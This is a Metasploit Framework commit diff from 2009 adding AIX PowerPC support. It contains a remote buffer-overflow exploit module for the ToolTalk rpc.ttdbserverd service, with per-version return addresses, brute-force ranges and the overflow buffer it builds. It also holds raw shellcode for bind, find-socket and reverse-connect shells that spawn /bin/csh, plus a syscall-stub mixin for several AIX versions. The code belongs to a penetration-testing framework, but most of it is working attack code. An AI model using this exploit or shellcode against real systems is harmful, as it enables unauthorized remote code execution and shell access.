1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

All your POWER are belong to us.

git-svn-id: file:///home/svn/framework3/trunk@6698 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Ramon de C Valle 2009-06-23 03:49:25 +00:00
parent d0fe4e8610
commit c2362ec409
12 changed files with 490 additions and 500 deletions

View File

@ -97,6 +97,11 @@ module Auxiliary::Report
report_note(opts)
end
def find_note(host, ntype)
return if not db
framework.db.find_note(host, ntype)
end
end
end

View File

@ -234,6 +234,15 @@ class DBManager
block.call(note)
end
end
#
# Find a note matching this host address and note type
#
def find_note(host, ntype)
Note.find_by_ntype(ntype, :include => [:host],
:conditions => ['hosts.address = ?', host])
end
#
# This methods returns a list of all notes in the database

View File

@ -19,6 +19,7 @@ class Payload < Msf::Module
require 'msf/core/payload/stager'
# Platform specific includes
require 'msf/core/payload/aix'
require 'msf/core/payload/bsd'
require 'msf/core/payload/linux'
require 'msf/core/payload/osx'
@ -563,4 +564,4 @@ protected
end
end
end

152
lib/msf/core/payload/aix.rb Normal file
View File

@ -0,0 +1,152 @@
require 'msf/core'
require 'msf/core/auxiliary'
###
#
# This class is here to implement advanced features for AIX-based
# payloads. AIX payloads are expected to include this module if
# they want to support these features.
#
###
module Msf::Payload::Aix
include Msf::Auxiliary::Report
#
# This mixin is chained within payloads that target the AIX platform.
# It provides special prepends, to support things like chroot and setuid
# and detect AIX version.
#
def initialize(info = {})
ret = super(info)
register_options(
[
Msf::OptString.new('AIX', [ true, 'IBM AIX Version', '6.1.4' ]),
], Msf::Payload::Aix)
ret
end
#
# Overload the generate() call to prefix our stubs and detect AIX version
#
def generate(*args)
@aix = datastore['AIX']
#if not assoc_exploit.nil?
# note = find_note(assoc_exploit.rhost, 'AIX')
# if not note.nil?
# @aix = note['data']
# end
#end
__CAL = 511
case @aix
when '6.1.4'
__NR_execve = 7
__NR_getpeername = 211
__NR_accept = 237
__NR_listen = 240
__NR_bind = 242
__NR_socket = 243
__NR_connect = 244
__NR_close = 278
__NR_kfcntl = 658
when '6.1.3'
__NR_execve = 7
__NR_getpeername = 205
__NR_accept = 232
__NR_listen = 235
__NR_bind = 237
__NR_socket = 238
__NR_connect = 239
__NR_close = 272
__NR_kfcntl = 644
when '6.1.2'
__NR_execve = 7
__NR_getpeername = 205
__NR_accept = 232
__NR_listen = 235
__NR_bind = 237
__NR_socket = 238
__NR_connect = 239
__NR_close = 272
__NR_kfcntl = 635
when '6.1.1'
__NR_execve = 7
__NR_getpeername = 202
__NR_accept = 229
__NR_listen = 232
__NR_bind = 234
__NR_socket = 235
__NR_connect = 236
__NR_close = 269
__NR_kfcntl = 614
when '6.1.0'
__NR_execve = 6
__NR_getpeername = 203
__NR_accept = 229
__NR_listen = 232
__NR_bind = 234
__NR_socket = 235
__NR_connect = 236
__NR_close = 269
__NR_kfcntl = 617
when '5.3.10', '5.3.9', '5.3.8', '5.3.7'
__NR_execve = 6
__NR_getpeername = 198
__NR_accept = 214
__NR_listen = 215
__NR_bind = 216
__NR_socket = 217
__NR_connect = 218
__NR_close = 245
__NR_kfcntl = 493
end
__NC_execve = -(__CAL - __NR_execve)
__NC_getpeername = -(__CAL - __NR_getpeername)
__NC_accept = -(__CAL - __NR_accept)
__NC_listen = -(__CAL - __NR_listen)
__NC_bind = -(__CAL - __NR_bind)
__NC_socket = -(__CAL - __NR_socket)
__NC_connect = -(__CAL - __NR_connect)
__NC_close = -(__CAL - __NR_close)
__NC_kfcntl = -(__CAL - __NR_kfcntl)
cal = "\x38\x5d"
@cal_execve = cal + [__NC_execve].pack('n')
@cal_getpeername = cal + [__NC_getpeername].pack('n')
@cal_accept = cal + [__NC_accept].pack('n')
@cal_listen = cal + [__NC_listen].pack('n')
@cal_bind = cal + [__NC_bind].pack('n')
@cal_socket = cal + [__NC_socket].pack('n')
@cal_connect = cal + [__NC_connect].pack('n')
@cal_close = cal + [__NC_close].pack('n')
@cal_kfcntl = cal + [__NC_kfcntl].pack('n')
return ''
end
protected
attr_accessor :aix
attr_accessor :cal_execve
attr_accessor :cal_getpeername
attr_accessor :cal_accept
attr_accessor :cal_bind
attr_accessor :cal_socket
attr_accessor :cal_connect
attr_accessor :cal_close
attr_accessor :cal_kfcntl
end

View File

@ -0,0 +1,287 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SunRPC
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in _tt_internal_realpath
function of the ToolTalk database server (rpc.ttdbserverd).
},
'Author' =>
[
'Adriano Lima <adriano@risesecurity.org>',
'Ramon de Carvalho Valle <ramon@risesecurity.org>'
],
'Version' => '$Revision$',
'Payload' =>
{
'BadChars' => "\x00",
},
'Targets' =>
[
[
'IBM AIX Version 6.1.4',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099430+4096,
'Addr1' => 0x2ff1ff50-8192,
'AIX' => '6.1.4',
'Payload' => { 'AIX' => '6.1.4' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099430-8192 },
'Stop' => { 'Ret' => 0x20099430+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.3',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.3',
'Payload' => { 'AIX' => '6.1.3' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.2',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.2',
'Payload' => { 'AIX' => '6.1.2' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.1',
'Payload' => { 'AIX' => '6.1.1' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 6.1.0',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.0',
'Payload' => { 'AIX' => '6.1.0' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20099280-8192 },
'Stop' => { 'Ret' => 0x20099280+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096ba0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.9',
'Payload' => { 'AIX' => '5.3.9' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096ba0-8192 },
'Stop' => { 'Ret' => 0x20096ba0+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.10',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096bf0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.10',
'Payload' => { 'AIX' => '5.3.10' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096bf0-8192 },
'Stop' => { 'Ret' => 0x20096bf0+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.9',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096ba0+4096,
'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.9',
'Payload' => { 'AIX' => '5.3.9' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096ba0-8192 },
'Stop' => { 'Ret' => 0x20096ba0+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.8',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096c10+4096,
'Addr1' => 0x2ff1ff98-8192,
'AIX' => '5.3.8',
'Payload' => { 'AIX' => '5.3.8' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096c10-8192 },
'Stop' => { 'Ret' => 0x20096c10+8192 },
'Step' => 1024
}
}
],
[
'IBM AIX Version 5.3.7',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0x20096c10+4096,
'Addr1' => 0x2ff1ff98-8192,
'AIX' => '5.3.7',
'Payload' => { 'AIX' => '5.3.7' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x20096c10-8192 },
'Stop' => { 'Ret' => 0x20096c10+8192 },
'Step' => 1024
}
}
],
[
'Debug IBM AIX Version 6.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa,
'AIX' => '6.1.4',
'Payload' => { 'AIX' => '6.1.4' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xaabbccdd },
'Stop' => { 'Ret' => 0xaabbccdd },
'Step' => 1024
}
}
],
[
'Debug IBM AIX Version 5.3',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa,
'AIX' => '5.3.10',
'Payload' => { 'AIX' => '5.3.10' },
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xaabbccdd },
'Stop' => { 'Ret' => 0xaabbccdd },
'Step' => 1024
}
}
],
],
'DefaultTarget' => 0))
end
def brute_exploit(brute_target)
begin
print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret'])
sunrpc_create('tcp', 100083, 1)
if target['AIX'] =~ /6\./
buf = "A"
else
buf = "AA"
end
buf << [target['Addr1']].pack('N') * (1022 + 8)
buf << [brute_target['Ret']].pack('N') * 32
if target['AIX'] =~ /6\./
buf << "AAA"
else
buf << "AA"
end
buf << "\x7f\xff\xfb\x78" * 1920
buf << payload.encoded
buf = XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)
print_status('Sending procedure 15 call message...')
sunrpc_call(15, buf)
sunrpc_destroy
handler
rescue Rex::Proto::SunRPC::RPCTimeout
# print_error('RPCTimeout')
rescue EOFError
# print_error('EOFError')
end
end
end

View File

@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'solaris',
'References' =>
[
['URL', 'http://risesecurity.org/advisory/RISE-2008001/'],
['URL', 'http://risesecurity.org/advisories/RISE-2008001.txt'],
],
'Privileged' => true,
'License' => MSF_LICENSE,
@ -164,4 +164,4 @@ class Metasploit3 < Msf::Exploit::Remote
XDR.encode(str, 3, 4, int, 0, 0)
end
end
end

View File

@ -18,6 +18,7 @@ require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Aix
def initialize(info = {})
super(merge_info(info,
@ -34,62 +35,17 @@ module Metasploit3
{
'Offsets' =>
{
'LPORT' => [ 77, 'n' ],
'LPORT' => [ 82, 'n' ],
},
}
))
register_options(
[
OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]),
], self.class)
end
def generate
case datastore['AIXLEVEL']
when '4.1.0'
cal_socket = "\x38\x5d\xfe\x58" # cal r2,-424(r29) #
cal_bind = "\x38\x5d\xfe\x57" # cal r2,-425(r29) #
cal_listen = "\x38\x5d\xfe\x56" # cal r2,-426(r29) #
cal_accept = "\x38\x5d\xfe\x54" # cal r2,-428(r29) #
cal_close = "\x38\x5d\xfe\x5f" # cal r2,-417(r29) #
cal_kfcntl = "\x38\x5d\xfe\xd7" # cal r2,-297(r29) #
cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) #
when '4.2.0'
cal_socket = "\x38\x5d\xfe\x5c" # cal r2,-420(r29) #
cal_bind = "\x38\x5d\xfe\x5b" # cal r2,-421(r29) #
cal_listen = "\x38\x5d\xfe\x5a" # cal r2,-422(r29) #
cal_accept = "\x38\x5d\xfe\x59" # cal r2,-423(r29) #
cal_close = "\x38\x5d\xfe\x63" # cal r2,-413(r29) #
cal_kfcntl = "\x38\x5d\xfe\xe8" # cal r2,-280(r29) #
cal_execve = "\x38\x5d\xfe\x03" # cal r2,-509(r29) #
when '4.3.0'
cal_socket = "\x38\x5d\xfe\x6a" # cal r2,-406(r29) #
cal_bind = "\x38\x5d\xfe\x69" # cal r2,-407(r29) #
cal_listen = "\x38\x5d\xfe\x68" # cal r2,-408(r29) #
cal_accept = "\x38\x5d\xfe\x66" # cal r2,-410(r29) #
cal_close = "\x38\x5d\xfe\x72" # cal r2,-398(r29) #
cal_kfcntl = "\x38\x5d\xfe\xfd" # cal r2,-259(r29) #
cal_execve = "\x38\x5d\xfe\x05" # cal r2,-507(r29) #
when '4.3.3'
cal_socket = "\x38\x5d\xfe\x79" # cal r2,-391(r29) #
cal_bind = "\x38\x5d\xfe\x78" # cal r2,-392(r29) #
cal_listen = "\x38\x5d\xfe\x77" # cal r2,-393(r29) #
cal_accept = "\x38\x5d\xfe\x76" # cal r2,-394(r29) #
cal_close = "\x38\x5d\xfe\x83" # cal r2,-381(r29) #
cal_kfcntl = "\x38\x5d\xff\x10" # cal r2,-240(r29) #
cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) #
when '5.3.0'
cal_socket = "\x38\x5d\xfe\x8e" # cal r2,-370(r29) #
cal_bind = "\x38\x5d\xfe\x8d" # cal r2,-371(r29) #
cal_listen = "\x38\x5d\xfe\x8c" # cal r2,-372(r29) #
cal_accept = "\x38\x5d\xfe\x8b" # cal r2,-373(r29) #
cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) #
cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) #
cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) #
end
def generate(*args)
super(*args)
payload =
payload =
"\x7f\xff\xfa\x79" +# xor. r31,r31,r31 #
"\x40\x82\xff\xfd" +# bnel <bndsockcode> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
@ -104,40 +60,40 @@ module Metasploit3
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x38\x9d\xfe\x02" +# cal r4,-510(r29) #
"\x38\x7d\xfe\x03" +# cal r3,-509(r29) #
cal_socket +
@cal_socket +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x7c\x1b\x78" +# mr r28,r3 #
"\x38\xbd\xfe\x11" +# cal r5,-495(r29) #
"\x3f\x60\xff\x02" +# liu r27,-254 #
"\x63\x7b\x04\xd2" +# oril r27,r27,1234 #
"\x63\x7b\x11\x5c" +# oril r27,r27,4444 #
"\x97\xe1\xff\xfc" +# stu r31,-4(r1) #
"\x97\x61\xff\xfc" +# stu r27,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
cal_bind +
@cal_bind +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x83\xe3\x78" +# mr r3,r28 #
cal_listen +
@cal_listen +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x83\xe3\x78" +# mr r3,r28 #
cal_accept +
@cal_accept +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x03" +# cal r25,-509(r29) #
"\x7f\x23\xcb\x78" +# mr r3,r25 #
cal_close +
@cal_close +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\x25\xcb\x78" +# mr r5,r25 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x43\xd3\x78" +# mr r3,r26 #
cal_kfcntl +
@cal_kfcntl +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x37\x39\xff\xff" +# ai. r25,r25,-1 #
@ -151,9 +107,9 @@ module Metasploit3
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
cal_execve +
@cal_execve +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"\x4e\x80\x04\x21" +# bctrl #
"/bin/csh"
end

View File

@ -18,6 +18,7 @@ require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Aix
def initialize(info = {})
super(merge_info(info,
@ -39,42 +40,12 @@ module Metasploit3
}
))
register_options(
[
OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]),
], self.class)
end
def generate
case datastore['AIXLEVEL']
when '4.1.0'
cal_getpeername = "\x38\x5d\xfe\x44" # cal r2,-444(r29) #
cal_close = "\x38\x5d\xfe\x5f" # cal r2,-417(r29) #
cal_kfcntl = "\x38\x5d\xfe\xd7" # cal r2,-297(r29) #
cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) #
when '4.2.0'
cal_getpeername = "\x38\x5d\xfe\x49" # cal r2,-439(r29) #
cal_close = "\x38\x5d\xfe\x63" # cal r2,-413(r29) #
cal_kfcntl = "\x38\x5d\xfe\xe8" # cal r2,-280(r29) #
cal_execve = "\x38\x5d\xfe\x03" # cal r2,-509(r29) #
when '4.3.0'
cal_getpeername = "\x38\x5d\xfe\x56" # cal r2,-426(r29) #
cal_close = "\x38\x5d\xfe\x72" # cal r2,-398(r29) #
cal_kfcntl = "\x38\x5d\xfe\xfd" # cal r2,-259(r29) #
cal_execve = "\x38\x5d\xfe\x05" # cal r2,-507(r29) #
when '4.3.3'
cal_getpeername = "\x38\x5d\xfe\x66" # cal r2,-410(r29) #
cal_close = "\x38\x5d\xfe\x83" # cal r2,-381(r29) #
cal_kfcntl = "\x38\x5d\xff\x10" # cal r2,-240(r29) #
cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) #
when '5.3.0'
cal_getpeername = "\x38\x5d\xfe\x7b" # cal r2,-389(r29) #
cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) #
cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) #
cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) #
end
def generate(*args)
super(*args)
payload =
payload =
"\x7f\xff\xfa\x79" +# xor. r31,r31,r31 #
"\x40\x82\xff\xfd" +# bnel <fndsockcode> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
@ -96,22 +67,22 @@ module Metasploit3
"\x7f\x65\xdb\x78" +# mr r5,r27 #
"\x7f\x84\xe3\x78" +# mr r4,r28 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
cal_getpeername +
@cal_getpeername +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x3b\x5c\x01\xff" +# cal r26,511(r28) #
"\xa3\x5a\xfe\x03" +# lhz r26,-509(r26) #
"\x28\x1a\x04\xd2" +# cmpli 0,r26,1234 #
"\x28\x1a\x11\x5c" +# cmpli 0,r26,4444 #
"\x40\x82\xff\xd4" +# bne <fndsockcode+64> #
"\x3b\x3d\xfe\x03" +# cal r25,-509(r29) #
"\x7f\x23\xcb\x78" +# mr r3,r25 #
cal_close +
@cal_close +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\x25\xcb\x78" +# mr r5,r25 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
cal_kfcntl +
@cal_kfcntl +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x37\x39\xff\xff" +# ai. r25,r25,-1 #
@ -125,7 +96,7 @@ module Metasploit3
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
cal_execve +
@cal_execve +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"/bin/csh"

View File

@ -18,6 +18,7 @@ require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Aix
def initialize(info = {})
super(merge_info(info,
@ -40,47 +41,12 @@ module Metasploit3
}
))
register_options(
[
OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]),
], self.class)
end
def generate
case datastore['AIXLEVEL']
when '4.1.0'
cal_socket = "\x38\x5d\xfe\x58" # cal r2,-424(r29) #
cal_connect = "\x38\x5d\xfe\x59" # cal r2,-423(r29) #
cal_close = "\x38\x5d\xfe\x5f" # cal r2,-417(r29) #
cal_kfcntl = "\x38\x5d\xfe\xd7" # cal r2,-297(r29) #
cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) #
when '4.2.0'
cal_socket = "\x38\x5d\xfe\x5c" # cal r2,-420(r29) #
cal_connect = "\x38\x5d\xfe\x5d" # cal r2,-419(r29) #
cal_close = "\x38\x5d\xfe\x63" # cal r2,-413(r29) #
cal_kfcntl = "\x38\x5d\xfe\xe8" # cal r2,-280(r29) #
cal_execve = "\x38\x5d\xfe\x03" # cal r2,-509(r29) #
when '4.3.0'
cal_socket = "\x38\x5d\xfe\x6a" # cal r2,-406(r29) #
cal_connect = "\x38\x5d\xfe\x6b" # cal r2,-405(r29) #
cal_close = "\x38\x5d\xfe\x72" # cal r2,-398(r29) #
cal_kfcntl = "\x38\x5d\xfe\xfd" # cal r2,-259(r29) #
cal_execve = "\x38\x5d\xfe\x05" # cal r2,-507(r29) #
when '4.3.3'
cal_socket = "\x38\x5d\xfe\x79" # cal r2,-391(r29) #
cal_connect = "\x38\x5d\xfe\x7a" # cal r2,-390(r29) #
cal_close = "\x38\x5d\xfe\x83" # cal r2,-381(r29) #
cal_kfcntl = "\x38\x5d\xff\x10" # cal r2,-240(r29) #
cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) #
when '5.3.0'
cal_socket = "\x38\x5d\xfe\x8e" # cal r2,-370(r29) #
cal_connect = "\x38\x5d\xfe\x8f" # cal r2,-369(r29) #
cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) #
cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) #
cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) #
end
def generate(*args)
super(*args)
payload =
payload =
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel <cntsockcode> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
@ -88,7 +54,7 @@ module Metasploit3
"\x3b\xde\xfe\x25" +# cal r30,-475(r30) #
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"\xff\x02\x04\xd2" +# .long 0xff0204d2 #
"\xff\x02\x11\x5c" +# .long 0xff02115c #
"\x7f\x00\x00\x01" +# .long 0x7f000001 #
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
"\x44\xff\xff\x02" +# svca 0 #
@ -96,24 +62,24 @@ module Metasploit3
"\x3b\xa0\x01\xff" +# lil r29,511 #
"\x38\x9d\xfe\x02" +# cal r4,-510(r29) #
"\x38\x7d\xfe\x03" +# cal r3,-509(r29) #
cal_socket +
@cal_socket +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x7c\x1b\x78" +# mr r28,r3 #
"\x38\xbd\xfe\x11" +# cal r5,-495(r29) #
"\x38\x9e\xff\xf8" +# cal r4,-8(r30) #
cal_connect +
@cal_connect +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x3b\x7d\xfe\x03" +# cal r27,-509(r29) #
"\x7f\x63\xdb\x78" +# mr r3,r27 #
cal_close +
@cal_close +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\x65\xdb\x78" +# mr r5,r27 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x83\xe3\x78" +# mr r3,r28 #
cal_kfcntl +
@cal_kfcntl +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x37\x7b\xff\xff" +# ai. r27,r27,-1 #
@ -127,7 +93,7 @@ module Metasploit3
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
cal_execve +
@cal_execve +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"/bin/csh"

View File

@ -1,129 +0,0 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
def initialize(info = {})
super(merge_info(info,
'Name' => 'AIX Command Shell, Bind TCP Inline',
'Version' => '$Revision$',
'Description' => 'Listen for a connection and spawn a command shell',
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
'License' => MSF_LICENSE,
'Platform' => 'aix',
'Arch' => ARCH_PPC64,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'LPORT' => [ 77, 'n' ],
},
}
))
register_options(
[
OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]),
], self.class)
end
def generate
case datastore['AIXLEVEL']
when '5.3.0'
cal_socket = "\x38\x5d\xfe\x8e" # cal r2,-370(r29) #
cal_bind = "\x38\x5d\xfe\x8d" # cal r2,-371(r29) #
cal_listen = "\x38\x5d\xfe\x8c" # cal r2,-372(r29) #
cal_accept = "\x38\x5d\xfe\x8b" # cal r2,-373(r29) #
cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) #
cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) #
cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) #
end
payload =
"\x7f\xff\xfa\x79" +# xor. r31,r31,r31 #
"\x40\x82\xff\xfd" +# bnel <bndsockcode> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
"\x3b\xde\xfe\x1d" +# cal r30,-483(r30) #
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
"\x44\xff\xff\x02" +# svca 0 #
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
"\x3b\xa0\x01\xff" +# lil r29,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x38\x9d\xfe\x02" +# cal r4,-510(r29) #
"\x38\x7d\xfe\x03" +# cal r3,-509(r29) #
cal_socket +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x7c\x1b\x78" +# mr r28,r3 #
"\x38\xbd\xfe\x11" +# cal r5,-495(r29) #
"\x3f\x60\xff\x02" +# liu r27,-254 #
"\x63\x7b\x04\xd2" +# oril r27,r27,1234 #
"\x97\xe1\xff\xfc" +# stu r31,-4(r1) #
"\x97\x61\xff\xfc" +# stu r27,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
cal_bind +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x83\xe3\x78" +# mr r3,r28 #
cal_listen +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x83\xe3\x78" +# mr r3,r28 #
cal_accept +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x03" +# cal r25,-509(r29) #
"\x7f\x23\xcb\x78" +# mr r3,r25 #
cal_close +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\x25\xcb\x78" +# mr r5,r25 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x43\xd3\x78" +# mr r3,r26 #
cal_kfcntl +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x37\x39\xff\xff" +# ai. r25,r25,-1 #
